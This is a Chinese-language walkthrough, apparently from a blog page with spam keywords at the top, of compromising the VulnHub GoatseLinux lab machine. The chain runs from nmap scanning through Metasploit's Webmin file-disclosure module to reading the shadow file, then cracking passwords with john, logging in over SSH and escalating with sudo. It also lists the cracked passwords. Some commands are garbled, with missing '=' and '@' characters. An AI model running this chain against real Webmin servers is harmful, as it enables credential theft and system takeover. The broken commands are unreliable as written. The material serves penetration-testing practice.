微信公众号免费做影视网站,北京西站到北京南站,北京网站设计精选柚v米科技,网站建设学习课程一、准备工作
kali和靶机都选择NAT模式#xff08;kali与靶机同网段#xff09;
1.靶场环境
下载链接:GoatseLinux: 1 ~ VulnHub
2.kali的ip 命令:ifconfig 3.靶机的ip
扫描靶机ip sudo arp-scan -l 二、信息收集
1.nmap的信息收集
#xff08;1#xff09;扫描靶机…一、准备工作
kali和靶机都选择NAT模式kali与靶机同网段
1.靶场环境
下载链接:GoatseLinux: 1 ~ VulnHub
2.kali的ip 命令:ifconfig 3.靶机的ip
扫描靶机ip sudo arp-scan -l 二、信息收集
1.nmap的信息收集
1扫描靶机开放的端口及其服务 nmap -A 192.168.101.129 2.网站的信息收集
1靶机开放了80端口,先访问靶机网站看看有什么有用的信息
http://192.168.101.129
http://192.168.101.129/goatse.html
2看看靶机的10000端口
http://192.168.101.129:10000/ 这个登录网页是基于Web的系统管理工具Webmin可能从这里寻找突破口
3. msfconsole模块
1进入到msf msfconsole 2查找webmin可以利用的脚本 search webmin 3使用该脚本 use auxiliary/admin/webmin/file_disclosure 或者用序号代替 use 1 4查看需要设置的参数 show options 5设置RHOSTS(靶机) set RHOSTS 192.168.101.129 6使用run开启攻击 run 7将得到的信息放到shadow文件里面 vim shadow cat shadow 4.john解码
john --wordlist/usr/share/wordlists/rockyou.txt shadow 得到了4个密码用户 bobby jpelman kokomo jblow guestguest gapinggoatse 三、提权
1.用goatse用户ssh登录 ssh -oKexAlgorithmsdiffie-hellman-group1-sha1 -oHostKeyAlgorithmsssh-dss -oCiphers3des-cbc goatse192.168.101.129 因为登录远程登录到系统版本比较老只能采用以上方法登录 2.sudo提权 sudo -l gaping id sudo su id